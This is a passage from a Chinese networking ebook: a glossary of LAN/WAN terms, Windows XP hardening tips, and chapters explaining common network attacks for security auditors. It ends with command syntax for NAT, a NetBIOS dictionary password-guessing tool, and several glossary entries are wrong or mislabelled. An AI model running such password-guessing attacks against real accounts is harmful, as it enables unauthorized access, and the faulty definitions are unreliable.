? private branch exchange （专用分组交换机, PBX）—专用分组交换机是一种专用的电话

系统，可以与当地的电话系统相连，也可以不连，它也有一个人工的电话总机控制板。

? private branch exchange （自动用户交换机, PA X ）—自动用户交换机是一种完全自动的

（没有电话总机控制板）的专用电话系统。

? promiscuous mode （混合模式）—在混合模式中，在向网络其他连接的段发送帧之前，

网络设备就可以读取帧的目标地址。

? protocol （协议）—协议是人们建立的一套用以指定网络数据如何格式化为包、如何传

输、在接收端如何翻译的标准。

? protocol data unit （协议数据单元, PDU）—在同一个O S I协议栈的各层之间传输的信息。

? Protocol Independent Multicast （协议无关广播, PIM）—协议无关广播是一种多点传送

路由协议，与采用O S P F或R I P为主路由协议的网络兼容。

? public switched telephone network （公用电话交换网络, PSTN）—语音级电话服务。

Q

? Quality of Service （服务质量, QoS）—这是衡量网络传输、质量输入输出总和和可靠性

的手段。

 

(本章完)

[(第37章 术语表（4）)]

R

? radio frequency interference （无线电频率干扰, RFI）—因为电气设备发射的无线电波频

率与网络信号传输使用的频率相同而引起的信号干扰为无线电频率干扰，也称射频干

扰。

? R e a l – Time protocol （实时协议, RT P ）—实时协议是为实时多媒体应用程序如视频会议

等开发的多点传送协议。

? R e a l – Time Transport Control Protocol （实时传输控制协议, RT C P ）—实时传输控制协议

与RT P协同工作，在多点广播传输上提供专门的控制。，如在缺少带宽时，将彩色降级

为单色。RT C P也提供管理信息。

? redirector （转向器）—转向器是一种通过应用层使用的服务，用来识别并访问其他计算

机。

? redundancy （冗余）—提供额外的电缆和设备来保证计算机和计算机系统能够连续地工

作，甚至在一个或多个网络或计算机单元出现故障时仍能正常工作。

? regional Bell operating company, （RBOC）—这是为指定地区提供电话业务的电信公司。

? remote bridge （远程网桥）—远程网桥是穿越同一个城市、在城市之间、在州之间连接

网络以创建一个大网络的设备。

? Remote Network Monitoring （远程网络监控, RMON）—一种利用远程网络结点（例如工

作站或者网络设备）执行网络监控的标准，其功能包括收集信息进行网络协议分析。可

以在网络的远程部分设立监测器，例如中间可以经过一些网桥或者路由器。

? remote router （远程路由器）—远程路由器是跨越极广的地理区域（如城市之间、州之间

和国家之间）将网络连到WA N中的网络设备。

术语表计计305

? repeater （转发器）—转发器是将包放大并重新定时、以让它沿所有连接在转发器上的

输出电缆段发送的网络传输设备。

? Request for Comment （请求注释, RFC）—请求注释是为推动网络互连、Internet 和计算

机通信而发布的信息文档。Internet 工程组（ I E T F ）负责对R F C进行分类和管理。

? Resource Reservation Protocol （资源预订协议, RSVP）—资源预订协议用于基于T C P / I P

的网络中，可使应用程序能够预订所需要的计算机和网络资源，如带宽、缓冲、最大脉

冲串和服务级别等。R S V P的英文全写为Resource Reservation Protocol ，有时也写作

Resource Reservation Setup Protocol。

? Reverse Address Resolution Protocol（反向地址解析协议, RARP）—一种网络协议，网

络结点上的软件应用或者网络结点本身可以利用该协议确定它自己的I P。

? ring topology （环形拓扑）—在环形拓扑结构中，网络是由数据的连续路径构成的，没

有起始点和终止点，因此也就没有终结器。

? riser cable （上升电缆）—垂直电缆的另一个称呼，指大楼内各楼层间连接用的电缆。

? router （路由器）—路由器是连接访问方法相同或不同的网络的网络设备，如路由器可

以将以太网与令牌环网相连。路由器根据源于网络管理员的路由表数据、发现的最有效

的路由和预编程信息，使用决策进程来向网络提交包。

? Routing Information Protocol （路由信息协议, RIP）—路由信息协议是路由器用来与其

他路由器交流整个路由表的协议。

S

? scan lines （扫描线）—扫描线用来构造电视视频图像。扫描线中含有图像的片面视图，

并从上到下在显示器上显示。在美国，一个电视帧由5 2 5扫描线组成。

? Secure Sockets Layer （加密套接字协议层, SSL）—S S L是一种在服务器和客户端采用的

数字加密技术，例如在客户端的浏览器和Internet 服务器之间可以使用S S L。

? segment （段）—段是符合I E E E规范的一条电缆，如一段1 8 5米长带有3 0个结点（包括终

结器和网络设备）的10Base2 电缆。

? Sequence Packet Exchange （序列包交换, SPX）—一个N o v e l l协议，当对数据可靠性有

特殊要求时，用于应用软件的网络传输。

? serial Line Internet Protocol （串行线路互连网协议, SLIP）— 一个电信网络的WA N协

议，用于在两个电信载波之间建立最快的路由。

? Service data unit （服务数据单元, SDU）—S D U是一种已经在O S I层间进行过转换并删除

了其中的控制信息和转换指令的协议数据单元。

? service level agreement （服务标准协议, SLA）—WA N服务提供商提出的服务标准书面

保证，包括线路必须有效的最小时间。

? shielded twisted-pair cable （屏蔽双绞线, STP）—屏蔽双绞线是一种网络电缆，由绞在

一起的绝缘电线对组成，并包围着一层屏蔽材料，以进行E M I和R F I保护。所有这些都

处在一个保护套管中。

? Simple Network Management （简单网络管理协议, SNMP）—T C P / I P协议套中的一个协

议，计算机或者网络设备可以通过该协议收集关于网络性能的标准化数据。

306计计局域网/广域网的设计与实现

下载

? spanning tree algorithm （生成树算法）—生成树算法是用以确保帧不会无限循环传输的

软件，并可以使帧沿成本最低最有效的网络路径传输。

? spread-spectrum communications （传播光谱技术）—这种通信技术主要用在无线网络

中，在网络间进行高频率通信时可以用它来替代电缆。

? star topology （星形拓扑）—这是最古老的一种网络设计，整个网络是由多个连接在集

线器上的结点构成。

? stateful autoconfiguration （有状态自动配置）—一种利用网络管理软件，基于网络管理

员给出的一组参数自动分配I P地址的技术。

? stateless autoconfiguration （无状态自动配置）—一种分配I P地址的方法，在该方法中，

网络设备自己给自己分配地址。

? state-transition encoding （状态转换编码）—这是一种检验信号状态的改变（如从高到低、

从低到高等）的数字编码方法。

? static routing （静态路由）—静态路由是一种路由进程，包括对网络管理员根据预先调

试的路由指令而做出的路由决定的控制。

? statistical multiple access （统计多路访问）—统计多路访问是根据任务所需分配通信资

源的一种交换方法，例如，给视频文件分配更多的带宽，而给较小的电子表文件分配较

少的带宽。

? store-and-forward switching （存储转发交换）—在存储转发交换技术中，包可以被缓存，

直到完全接收后再发送，并且网络上有一条开放的信道可以发送包。

? streaming （流）—在从网络接收来的M P E G视频文件完全下载之前播放。

? subnet mask （子网模）—子网模（也称子网掩码）是I P地址的某个确定的部分，用于指明

一个网络的地址类别，可以利用它将网络分成子网，以便进行网络流量管理。

? Switched Multimegabit Data Services （交换多兆位数据服务, **DS）—也叫做交换式兆

位数据服务，是一种由地区电话公司开发的传输方法，利用该技术可以在M A N和WA N

上提供基于信元的高速通信。

? switched virtual circuit （交换虚拟电路, SVC）—为持续的通信会话而创建的一种通信信

道，通常位于可以处理多个信道的介质上。

? synchronous communications （同步通信）—由数据的连续脉冲串进行的通信，而且数

据的连续脉冲串要受每一个脉冲串起始位置的时钟信号控制。

? synchronous communications （异步通信0—异步通信发生离散的单元中，在离散单元

里，单元的开始位置由前面的开始位标示，终止位由单元最后的停止位给出信号。

? synchronous optical network （同步光纤网络, ONET）—一种光纤通信技术，可以进行高

速的数据通信（每秒在兆位以上）。基于S O N E T的网络可以完成语音、数据和视频通信。

? System Network Architecture （系统网络结构, SNA）—系统网络结构是I B M使用的一种

分层通信协议，以便I B M主机和终端进行通信。

? Systeme Electronique Pour Couleur Avec Memoire （顺序与存储彩色电视系统, SECAM）

—顺序与存储彩色电视系统是一种与PA L相似的电视传输标准，但是是用在法国、俄

国和非洲的一些国家。

T

? T-carrier （T载波）—T载波是可用于数据通信的专用电话线路，将两个不同的位置连接

起来，以进行点对点的通信。

? TCP port （TCP端口）—与虚拟电路类似的一种功能，通过T C P端口，位于两个通信结

点或者设备上的单个进程之间可以进行通信。每个通信的进程都有自己的端口号，在有

多个进程同时进行通信的时候，可以使用多个端口。

? telco—地区的电话公司，如US We s t。

? Telecommunications Industry Association （通信工业联合会, TIA）—T I A是E

 

(本章完)

[(第38章 术语表（5）)]

I A中的建立

标准的一个实体，主要开发远程通信和布线标准。

? television frame （电视帧）—电视帧是一系列图片中用来模仿动作的一幅完整的图片。

? Te l n e t—一种T C P / I P应用协议，可以提供终端仿真。

? terminal （终端）—终端是具有监视器和键盘的设备，但对本地处理而言是没有C P U的。

终端与主机相连，处理过程均在主机上完成。

? terminal adapter （终端适配器, TA ）—终端适配器是将计算机或传真机连接在I S D N线路

上的设备。终端适配器可将数字信号转变为可以在数字电话线路上发送的协议。

? terminal emulation （终端仿真）—用软件来使计算机（如P C ）的行为类似于终端。

? time-division multiple access （时分多路访问技术）—这种交换方法通过划分时间槽（每

个时间槽对应一台设备，设备从中可以进行信号传输）使得多个设备可以在同一种通信

介质上进行通信。

? token ring （令牌环）—这是由I B M公司于7 0年代开发的一种访问方法，它仍然保留着主

要的L A N技术。这种传输方法在物理上采用星形拓扑结构，而在逻辑上采用环形拓扑结

构。虽然在令牌环网中，每一个结点也连接在中央集线器上，但包在结点到结点间进行

传输时就好像没有开始点和终止点一样。

? topology （拓扑结构）—拓扑结构是电缆上发送包所遵循的电缆的物理布局和逻辑路径。

? translation （转换）—转换是一种传输协议转变为另一种传输协议的方法。

? translational bridge （转换网桥）—转换网桥是使用不同传输协议的网络间的网桥，它可

以向网络传送适当的不同协议。

? Transmission Control Protocol （传输控制协议, TCP）—这是一种传输协议，属于T C P / I P

协议套的一部分，用于在网络软件应用进程之间建立通信会话，并且可以通过控制数据

流量做到可靠的端到端数据传输。

? Trivial File Transfer Protocol （普通文件传输协议, TFTP）—T C P / I P文件传输协议，用于

传输无盘工作站启动所使用的文件。

? trunking （中继）—在两个网络传输设备之间的两个或多个物理链接，它们组成一个集

合可当做一条线路使用，总的传输速率是每个链接传输速率的总和。

? twisted-pair cable （双绞线）—双绞线是一种柔性通信电缆，其中包含着绞在一起的成

对的绝缘铜线以减少E M I和R F I的干扰，双绞线的外部还覆盖着一层绝缘套管。

下载

? uninterruptible power supply （不间断电源, UPS）—在电源故障或电压不足时，提供快

速电池供电的设备，有时是在一个电子设备中，有时作为一个单独的设备。

? universal serial bus （通用串行总线, USB）—通用串行总线是为连接各种外设（如打印

机、调制解调器、磁带驱动器）而建立的标准，将要替代传统并行和串行端口的使用。

? unshielded twisted-pair cable （ 非屏蔽双绞线, UTP）—这是一种在绞在一起的成对的绝

缘线和外部套管间没有屏蔽的电缆。

? User Datagram Protocol （用户数据报协议, UDP）—一种使用I P的协议，它和T C P的位

置一样，可以提供低开销的无连接服务。

? U s e r-Network Inte**ce（用户—网络接口, UNI）—一个AT M接口，用于终端结点到交换

机的连接。

V

? virtual circuit （虚拟电路）—虚拟电路是由O S I网络层为发送和接收数据而建立的逻辑

通信路径。

? virtual LAN （虚拟局域网, VLAN）—虚拟局域网是在子网组之外建立的逻辑网络，而

子网组是通过交换机和路由器上的智能软件建立并独立于物理网络拓扑结构的。

? virtual path identifier/virtual channel identifier （ 虚拟路径标识符/虚拟通道标识符,

V P I / V C I ）— AT M信元中的一个编码，使得信元能够到达想要到达的输出接口。

W

? wavelength division multiplexing （波长分割多路转接器, WDM）—波长分割多路转接器

是一种用于光纤介质的交换技术，可以截取几个输入连接，并将其**为在光纤电缆上

传送的光谱范围内的不同的波长。

? wide area network （广域网, WA N ）—广域网是一种意义深远的网络系统，可以跨越极

大的物理空间。

X

? X . 2 5—一种老的非常可靠的分组交换协议，最高可以以2 . 0 4 8 M b p s的速率连接到远程

的网络上。X . 2 5协议定义了D T E和D C E之间的通信。

? X/Open XA—基于U N I X的系统所使用的一种开放数据库标准。

? Xerox Network System （施乐网络系统, XNS）— 一个由施乐公司在网络早期开发的用

于以太网通信的协议。

(本章完)

[(第39章 个人电脑安全)]

由于现在用xp的用户相对多一点，所以以下基本都是针对xp的，当然有很多都是通用的，由于考虑到新手，所以讲的都是基础的，好接受点。哪里不好的请直言。

好了，follow me

一：计算机个人密码

添加一个合法用户，尽量不使用管理员账号登陆。这里告诉大家一个小技巧，把管理员账号的名称（ＡＤＭＩＮＩＳＴＲＡＴＯＲ）改成一个不起眼的名字（控制面板-用户帐户里改）。然后建立一个受限的用户（名字设为ａｄｍｉｎｉ），限制他的种种操作，并设置繁杂的密码,这样……不用说了吧（当别人费尽九牛二虎之力进来时发觉…………？　把它气死！！！！）

————–snowchao

还有设置复杂的口令，更改有助于防止口令蠕虫轻易的进入系统。

二：禁用没用的服务

这是icool早期的作品，呵呵，相信很多人都看过了，不过对刚来的还是很有用的哦。

关闭了这些服务不仅增加了安全系数，而且可以使你的爱机提速

不过当你遇到禁用了某些服务后有些东西不能用了就马上去看看被禁用的服务的说明

三：关闭不用的端口

如果觉得下面的端口所对应的服务没用，那么就关了好了

下面是几个常见的端口的关闭方法

1、139端口的关闭

139端口是NetBIOS　Session端口，用来文件和打印共享

关闭139口听方法是在”网络和拨号连接”中”本地连接”中选取”Internet协议（TCP/IP）”属性，进入”高级TCP/IP设置””WINS设置”里面有一项”禁用TCP/IP的NETBIOS”，打勾就关闭了139端口。

2、445端口的关闭

修改注册表，添加一个键值

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetBT\Parameters在右面的窗口建立一个**BDeviceEnabled 为REG_DWORD类型键值为 0

这样就ok了

3、3389端口的关闭

xp：我的电脑上点右键选属性–>远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

win2000server 开始–>程序–>管理工具–>服务里找到Terminal Services服务项，

选中属性选项将启动类型改成手动，并停止该服务。

win2000pro 开始–>设置–>控制面板–>管理工具–>服务里找到Terminal Services

服务项，选中属性选项将启动类型改成手动，并停止该服务。

四：漏洞检测，补丁

下面是天网的一个检测个人系统漏洞的网址，大家可以去检测一下自己的系统

http://pfw.sky.net.cn/news/info/list.php?sessid=&sortid=17

还有瑞星杀毒软件也有检测系统漏洞的功能（打开瑞星-工具-系统漏洞扫描）

当发现漏洞后就要去堵漏洞了，接下来就是打补丁，不仅可以增强兼容性外，更重要的是堵上已发现的安全漏洞。但是不是打上所以的补丁就最好，最好当你下载前先看一下是什么内容的，如果是你已经关闭了服的务之类的补丁就不用下了。

下面是上海交大的下载页面，安全系数高点，可以下载系统未打的补丁

http://windowsupdate.sjtu.edu.cn/

五：杀毒软件和防火墙

要系统安全，防火墙是很重要的，当然，有了防火墙也不是没事了，还要记得定时升级杀毒软件杀毒。一般一新期一次差不多了。

建议不要装过多的防火墙和杀毒软件，这样可以加快启动，也可以避免某些冲突。下面的防火墙和杀毒软件是新手区推荐的

http://hackbase.com/bbs/viewthread.php?tid=34405

六：数据备份

系统还原是默认打开的，它会自动备分，当遇到不可解决的问题时，可以尝试一下系统还原，而不用重装系统。开始-运行输入msconfig在一般这项里有”开始系统还原一项”如果要还原就点这里了。

 

(本章完)

[(第40章 网络安全知识（1）)]

一旦黑客定位了你的网络，他通常会选定一个目标进行渗透。通常这个目标会是安全漏洞最多或是他拥有最多攻击工具的主机。非法入侵系统的方法有很多，你应当对这些方法引起注意。

　　常见攻击类型和特征

　　攻击特征是攻击的特定指纹。入侵监测系统和网络扫描器就是根据这些特征来识别和防范攻击的。下面简要回顾一些特定地攻击渗透网络和主机的方法。

　　常见的攻击方法

　　你也许知道许多常见的攻击方法，下面列出了一些：

　　· 字典攻击：黑客利用一些自动执行的程序猜测用户命和密码，审计这类攻击通常需要做全面的日志记录和入侵监测系统（IDS）。

　　· Man-in-the-middle攻击：黑客从合法的传输过程中嗅探到密码和信息。防范这类攻击的有效方法是应用强壮的加密。

　　· 劫持攻击：在双方进行会话时被第三方（黑客）入侵，黑客黑掉其中一方，并冒充他继续与另一方进行会话。虽然不是个完全的解决方案，但强的验证方法将有助于防范这种攻击。

　　· 病毒攻击：病毒是能够自我复制和传播的小程序，消耗系统资源。在审计过程中，你应当安装最新的反病毒程序，并对用户进行防病毒教育。

　　· 非法服务：非法服务是任何未经同意便运行在你的操作系统上的进程或服务。你会在接下来的课程中学到这种攻击。

　　· 拒绝服务攻击：利用各种程序（包括病毒和包发生器）使系统崩溃或消耗带宽。

　　容易遭受攻击的目标

　　最常遭受攻击的目标包括路由器、数据库、Web和FTP服务器，和与协议相关的服务，如DNS、WINS和**B。本课将讨论这些通常遭受攻击的目标。

　　路由器

　　连接公网的路由器由于被暴露在外，通常成为被攻击的对象。许多路由器为便于管理使用SNMP协议，尤其是SNMPv1，成为潜在的问题。许多网络管理员未关闭或加密Telnet会话，若明文传输的口令被截取，黑客就可以重新配置路由器，这种配置包括关闭接口，重新配置路由跳计数等等。物理安全同样值得考虑。必须保证路由器不能被外人物理接触到进行终端会话。

　　过滤Telnet

　　为了避免未授权的路由器访问，你应利用防火墙过滤掉路由器外网的telnet端口和SNMP[161,162]端口

　　技术提示：许多网络管理员习惯于在配置完路由器后将Telnet服务禁止掉，因为路由器并不需要过多的维护工作。如果需要额外的配置，你可以建立物理连接。

　　路由器和消耗带宽攻击

　　最近对Yahoo、e-Bay等电子商务网站的攻击表明迅速重新配置路由器的重要性。这些攻击是由下列分布式拒绝服务攻击工具发起的：

　　· Tribal Flood Network（TFN）

　　· Tribal Flood Network（TFN2k）

　　· Stacheldraht（TFN的一个变种）

　　· Trinoo（这类攻击工具中最早为人所知的）

　　因为许多公司都由ISP提供服务，所以他们并不能直接访问路由器。在你对系统进行审计时，要确保网络对这类消耗带宽式攻击的反映速度。你将在后面的课程中学习如何利用路由器防范拒绝服务攻击。

　　数据库

　　黑客最想得到的是公司或部门的数据库。现在公司普遍将重要数据存储在关系型或面向对象的数据库中，这些信息包括：

　　· 雇员数据，如个人信息和薪金情况。

　　· 市场和销售情况。

　　· 重要的研发信息。

　　· 货运情况。

　　黑客可以识别并攻击数据库。每种数据库都有它的特征。如SQL Server使用1433/1434端口，你应该确保防火墙能够对该种数据库进行保护。你会发现，很少有站点应用这种保护，尤其在网络内部。

服务器安全　　WEB和FTP这两种服务器通常置于DMZ，无法得到防火墙的完全保护，所以也特别容易遭到攻击。Web和FTP服务通常存在的问题包括：

　　· 用户通过公网发送未加密的信息；

　　· 操作系统和服务存在众所周知的漏洞导致拒绝服务攻击或破坏系统；

　　· 旧有操作系统中以root权限初始运行的服务，一旦被黑客破坏，入侵者便可以在产生的命令解释器中运行任意的代码。

　　Web页面涂改

　　近来，未经授权对Web服务器进行攻击并涂改缺省主页的攻击活动越来越多。许多企业、政府和公司都遭受过类似的攻击。有时这种攻击是出于政治目的。大多数情况下Web页面的涂改意味着存在这入侵的漏洞。这些攻击通常包括Man-in-the-middle攻击（使用包嗅探器）和利用缓冲区溢出。有时，还包括劫持攻击和拒绝服务攻击。

　　邮件服务

　　广泛使用的**TP、POP3和IMAP一般用明文方式进行通信。这种服务可以通过加密进行验证但是在实际应用中通信的效率不高。又由于大多数人对多种服务使用相同的密码，攻击者可以利用嗅探器得到用户名和密码，再利用它攻击其它的资源，例如Windows NT服务器。这种攻击不仅仅是针对NT系统。许多不同的服务共享用户名和密码。你已经知道一个薄弱环节可以破坏整个的网络。FTP和**TP服务通常成为这些薄弱的环节。

　　与邮件服务相关的问题包括：

　　· 利用字典和暴力攻击POP3的login shell；

　　· 在一些版本中sendmail存在缓冲区溢出和其它漏洞；

　　· 利用E-mail的转发功能转发大量的垃圾信件

　　名称服务

　　攻击者通常把攻击焦点集中在DNS服务上。由于DNS使用UDP，而UDP连接又经常被各种防火墙规则所过滤，所以许多系统管理员发现将DNS服务器至于防火墙之后很困难。因此，DNS服务器经常暴露在外，使它成为攻击的目标。DNS攻击包括：

· 未授权的区域传输；

 

(本章完)

[(第41章 网络安全知识（2）)]

· DNS 毒药，这种攻击是指黑客在主DNS服务器向辅DNS服务器进行区域传输时插入错误的DNS信息，一旦成功，攻击者便可以使辅DNS服务器提供错误的名称到IP地址的解析信息；

　　· 拒绝服务攻击；

　　其它的一些名称服务也会成为攻击的目标，如下所示：

　　· WINS，”Coke”通过拒绝服务攻击来攻击没有打补丁的NT系统。

　　· **B服务（包括Windows的**B和UNIX的Samba）这些服务易遭受Man-in-the-middle攻击，被捕获的数据包会被类似L0phtCrack这样的程序破解。

　　· NFS和NIS服务。这些服务通常会遭受Man-in-the-middle方式的攻击。

　　在审计各种各样的服务时，请考虑升级提供这些服务的进程。

　　审计系统BUG

　　作为安全管理者和审计人员，你需要对由操作系统产生的漏洞和可以利用的软件做到心中有数。早先版本的Microsoft IIS允许用户在地址栏中运行命令，这造成了IIS主要的安全问题。其实，最好的修补安全漏洞的方法是升级相关的软件。为了做到这些，你必须广泛地阅读和与其他从事安全工作的人进行交流，这样，你才能跟上最新的发展。这些工作会帮助你了解更多的操作系统上的特定问题。

　　虽然大多数的厂商都为其产品的问题发布了修补方法，但你必须充分理解补上了哪些漏洞。如果操作系统或程序很复杂，这些修补可能在补上旧问题的同时又开启了新的漏洞。因此，你需要在实施升级前进行测试。这些测试工作包括在隔离的网段中验证它是否符合你的需求。当然也需要参照值得信赖的网络刊物和专家的观点。

　　审计Trap Door和Root Kit

　　Root kit是用木马替代合法程序。Trap Door是系统上的bug，当执行合法程序时却产生了非预期的结果。如老版本的UNIX sendmail，在执行debug命令时允许用户以root权限执行脚本代码，一个收到严格权限控制的用户可以很轻易的添加用户账户。

　　虽然root kit通常出现在UNIX系统中，但攻击者也可以通过看起来合法的程序在Windows NT中置入后门。象NetBus,BackOrifice和Masters of Paradise等后门程序可以使攻击者渗透并控制系统。木马可以由这些程序产生。如果攻击者够狡猾，他可以使这些木马程序避开一些病毒检测程序，当然用最新升级的病毒检测程序还是可以发现它们的踪迹。在对系统进行审计时，你可以通过校验分析和扫描开放端口的方式来检测是否存在root kit等问题。

　　审计和后门程序

　　通常，在服务器上运行的操作系统和程序都存在代码上的漏洞。例如，最近的商业Web浏览器就发现了许多安全问题。攻击者通常知道这些漏洞并加以利用。就象你已经知道的RedButton，它利用了Windows NT的漏洞使攻击者可以得知缺省的管理员账号，即使账号的名称已经更改。后门（back door）也指在操作系统或程序中未记录的入口。程序设计人员为了便于快速进行产品支持有意在系统或程序中留下入口。不同于bug，这种后门是由设计者有意留下的。例如，像Quake和Doom这样的程序含有后门入口允许未授权的用户进入游戏安装的系统。虽然看来任何系统管理员都不会允许类似的程序安装在网络服务器上，但这种情况还是时有发生。

　　从后门程序的危害性，我们可以得出结论，在没有首先阅读资料和向值得信赖的同事咨询之前不要相信任何新的服务或程序。在你进行审计时，请花费一些时间仔细记录任何你不了解它的由来和历史的程序。

　　审计拒绝服务攻击

　　Windows NT 易遭受拒绝服务攻击，主要是由于这种操作系统比较流行并且没有受到严格的检验。针对NT服务的攻击如此频繁的原因可以归结为：发展势头迅猛但存在许多漏洞。在审计Windows NT网络时，一定要花时间来验证系统能否经受这种攻击的考验。打补丁是一种解决方法。当然，如果能将服务器置于防火墙的保护之下或应用入侵监测系统的话就更好了。通常很容易入侵UNIX操作系统，主要因为它被设计来供那些技术精湛而且心理健康的人使用。在审计UNIX系统时，要注意Finger服务，它特别容易造成缓冲区溢出。

　　缓冲区溢出

　　缓冲区溢出是指在程序重写内存块时出现的问题。所有程序都需要内存空间和缓冲区来运行。如果有正确的权限，操作系统可以为程序分配空间。C和C++等编程语言容易造成缓冲区溢出，主要因为它们不先检查是否有存在的内存块就直接调用系统内存。一个低质量的程序会不经检查就重写被其它程序占用的内存，而造成程序或整个系统死掉，而留下的shell有较高的权限，易被黑客利用运行任意代码。

　　据统计，缓冲区溢出是当前最紧迫的安全问题。要获得关于缓冲区溢出的更多信息，请访问Http://www-4.ibm.com/software/de … verflows/index.heml

Telnet的拒绝服务攻击

　　Windows中的Telnet一直以来都是网络管理员们最喜爱的网络实用工具之一，但是一个新的漏洞表明，在Windows2000中Telnet在守护其进程时，在已经被初始化的会话还未被复位的情况下很容易受到一种普通的拒绝服务攻击。Telnet连接后，在初始化的对话还未被复位的情况下，在一定的时间间隔之后，此时如果连接用户还没有提供登录的用户名及密码，Telnet的对话将会超时。直到用户输入一个字符之后连接才会被复位。如果恶意用户连接到Windows2000的Telnet守护进程中，并且对该连接不进行复位的话，他就可以有效地拒绝其他的任何用户连接该Telnet服务器，主要是因为此时Telnet的客户连接数的最大值是1。在此期间任何其他试图连接该Telnet服务器的用户都将会收到如下错误信息：

　　Microsoft Windows Workstation allows only 1 Telnet Client LicenseServer has closed connection

　　察看”列出当前用户”选项时并不会显示超时的会话，因为该会话还没有成功地通过认证。

　　Windows NT的TCP port 3389存在漏洞

　　Windows NT Server 4.0 终端服务器版本所作的 DoS 攻击。这个安全性弱点让远端使用者可以迅速的耗尽 Windows NT Terminal Server 上所有可用的内存，造成主机上所有登陆者断线，并且无法再度登入。

　　说明：

　　1. Windows NT Server 4.0 终端服务器版本在 TCP port 3389 监听终端连接 （terminal connection），一旦某个 TCP 连接连上这个端口, 终端服务器会开始分配系统资源，以处理新的客户端连接，并作连接的认证工作。

　　2. 此处的漏洞在于：在认证工作完成前，系统需要拨出相当多的资源去处理新的连 接，而系统并未针对分配出去的资源作节制。因此远端的攻击者可以利用建立大 量 TCP 连接到 port 3389 的方法，造成系统存储体配置达到饱和。

　　3. 此时服务器上所有使用者连接都会处于超时状态，而无法继续连接到服务器上，远端攻击者仍能利用一个仅耗用低频宽的程式，做出持续性的攻击，让此 服务器处於最多记忆体被耗用的状态，来避免新的连接继续产生。

　　4. 在国外的测试报告中指出，长期持续不断针对此项弱点的攻击，甚至可以导致服务器持续性当机，除非重新开机，服务器将无法再允许新连接的完成。

　　解决方案：

　　1. 以下是修正程序的网址：

　　ftp://ftp.microsoft.com/bussys/w … sa/NT40tse/hotfixes postSP4/Flood-fix/

　　[注意]：因为行数限制，上面网址请合并为一行。

　　2. 更详细资料请参考 Microsoft 网站的网址：

　　http://www.microsoft.com/security/bulletins/ms99-028.asp.

　　防范拒绝服务攻击

　　你可以通过以下方法来减小拒绝服务攻击的危害：

　　· 加强操作系统的补丁等级。

　　· 如果有雇员建立特定的程序，请特别留意代码的产生过程。

　　· 只使用稳定版本的服务和程序。

　　审计非法服务，特洛伊木马和蠕虫

　　非法服务开启一个秘密的端口，提供未经许可的服务，常见的非法服务包括：

　　· NetBus

　　· BackOrifice 和 BackOrifice 2000

　　· Girlfriend

　　· 冰河2.X

　　· 秘密的建立共享的程序

　　许多程序将不同的非法服务联合起来。例如，BackOrifice2000允许你将HTTP服务配置在任意端口。你可以通过扫描开放端口来审计这类服务，确保你了解为什么这些端口是开放的。如果你不知道这些端口的用途，用包嗅探器和其它程序来了解它的用途。

　　技术提示：不要混淆非法服务和木马。木马程序通常包含非法服务，而且，木马程序还可以包含击键记录程序，蠕虫或病毒。

　　特洛伊木马

　　特洛伊木马是在执行看似正常的程序时还同时运行了未被察觉的有破坏性的程序。木马通常能够将重要的信息传送给攻击者。攻击者可以把任意数量的程序植入木马。例如，他们在一个合法的程序中安放root kit或控制程序。还有一些通常的策略是使用程序来捕获密码和口令的hash值。类似的程序可以通过E-mail把信息发送到任何地方。

　　审计木马

　　扫描开放端口是审计木马攻击的途径之一。如果你无法说明一个开放端口用途，你也许就检测到一个问题。所以，尽量在你的系统上只安装有限的软件包，同时跟踪这些程序和服务的漏洞。许多TCP/IP程序动态地使用端口，因此，你不应将所有未知的端口都视为安全漏洞。在建立好网络基线后，你便可以确定哪些端口可能存在问题了。

　　蠕虫

　　Melissa病毒向我们展示了TCP/IP网络是如何容易遭受蠕虫攻击的。在你审计系统时，通常需要配置防火墙来排除特殊的活动。防火墙规则的设置超出了本术的范围。但是，作为审计人员，你应当对建议在防火墙上过滤那些从不信任的网络来的数据包和端口有所准备。

　　蠕虫靠特定的软件传播。例如，在2000年三月发现的Win32/Melting.worm蠕虫只能攻击运行Microsoft Outlook程序的Windows操作系统。这种蠕虫可以自行传播，瘫痪任何种类的Windows系统而且使它持续地运行不稳定。

 

(本章完)

[(第42章 网络安全知识（3）)]

结合所有攻击定制审计策略

　　攻击者有两个共同的特点。首先，他们将好几种不同的方法和策略集中到一次攻击中。其次，他们在一次攻击中利用好几种系统。综合应用攻击策略可以增强攻击的成功率。同时利用好几种系统使他们更不容易被捕获。

　　例如，在实施IP欺骗时，攻击者通常会先实施拒绝服务攻击以确保被攻击主机不会建立任何连接。大多数使用Man-in-the-middle的攻击者会先捕获**B的密码，再使用L0phtCrack这样的程序进行暴力破解攻击。

　　渗透策略

　　你已经了解到那些网络设备和服务是通常遭受攻击的目标和黑客活动的攻击特征。现在，请参考下列的一些场景。它们将有助于你在审计过程中关注那些设备和服务。请记住，将这些攻击策略结合起来的攻击是最容易成功的。

　　物理接触

　　如果攻击者能够物理接触操作系统，他们便可以通过安装和执行程序来使验证机制无效。例如，攻击者可以重启系统，利用其它启动盘控制系统。由于一种文件系统可以被另一种所破坏，所以你可以使用启动盘获得有价值的信息，例如有管理权限的账号。

　　物理攻击的简单例子包括通过重新启动系统来破坏Windows95或98的屏幕锁定功能。更简单的物理攻击是该系统根本就没有进行屏幕锁定。

　　操作系统策略

　　近来，美国白宫的Web站点（http://www.whitehouse.gov）被一个缺乏经验的攻击者黑掉。攻击者侦查出该Web服务器（www1.whitehouse.gov）运行的操作系统是Solaris 7。虽然Solaris 7被成为艺术级的操作系统，但管理员并没有改变系统的缺省设置。虽然该站点的管理员设置了tripwire，但攻击者还是使用phf/ufsrestore命令访问了Web服务器。

　　较弱的密码策略

　　上面白宫网站被黑的例子可能是由于该系统管理员使用FTP来升级服务器。虽然使用FTP来更新网站并没有错，但大多数FTP会话使用明文传输密码。很明显，该系统管理员并没有意识到这种安全隐患。又由于大多数系统管理员在不同的服务上使用相同的密码，这使攻击者能够获得系统的访问权。更基本的，你可以保证/etc/passwd文件的安全。

　　NetBIOS Authentication Tool（NAT）

　　当攻击者以WindowsNT为目标时，他们通常会使用NetBIOS Authentication Tool（NAT）来测试弱的口令。这个程序可以实施字典攻击。当然它也有命令行界面，这种界面的攻击痕迹很小。而且命令行界面的程序也很好安装和使用。在使用NAT时，你必须指定三个文本文件和IP地址的范围。当然，你也可以指定一个地址。NAT使用两个文本文件来实施攻击而第三个来存储攻击结果。第一个文本文件包含一个用户列表，第二个文件中是你输入的猜测密码。

　　当使用命令行版本时，语法格式为：

　　 nat –u username.txt –p passwordlist.txt –o outputfile.txt

